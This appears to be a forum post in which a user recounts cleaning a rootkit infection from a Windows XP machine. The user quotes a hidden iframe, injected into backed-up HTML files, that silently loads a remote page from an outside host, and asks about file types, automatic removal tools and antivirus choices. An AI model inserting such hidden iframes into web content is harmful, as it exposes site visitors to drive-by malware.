Okay long story short, about 2 months ago my computer suffered a large virus attack from a roofkit virus thingy, AVG 8 however couldn't detect (as updating from the FREE 7.5 copy to 8.0, removes the required features and there weren't any prompts.) Then using a magnitude of AV software on windows based boot disk, ClamAV from Ubuntu, some of the viruses were removed but not all.
The above steps then made the system under windows unusable and so from Ubuntu live CD I backed up everything to DVD's, CD's and a spare 80GB HDD. All executable (exe, bat) files were removed and the only files going to the HDD were audio, video and a number of documents.
Removed all attached devices after using the shred command in Ubuntu to write over all of the space of the drive 3 times which took 2.5 days, I installed windows XP. Then using a disc created in Ubuntu tried to installed Avira AV, but couldn't as I hadn't installed the network card's drivers. so used Comodo instead. Once installed I set it to scan, nothing viruses found - perfect! I then installed Avira AV and again on the newly installed OS nothing.
A couple of days later I realised I need some files off the ext HDD so plugged it in and ran Avira and Comodo AV's on it. Comodo found nothing but Avira found 6 errors. All htm hack trying to re-direct using the following code:
Code:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
Manually I edited all of these files and removed them, and again ran all AV checks, nothing found perfect...
Just to be sure I used Windows search tool to locate all htm, php and html files to make sure. Buy doing this I found another 10 files which contained the code but weren't found by any of the AV's!
Now here's the questions:
1) Are there any other file formats this code can attach to!
2) Is there any automated tool to go through these files and automatically removed the code, or anything I instruct it to remove?
3) have I made a wise decision on changing from CPU hungry AVG Free, to Comodo (set to On Demand scan) and Avira as main real time scanning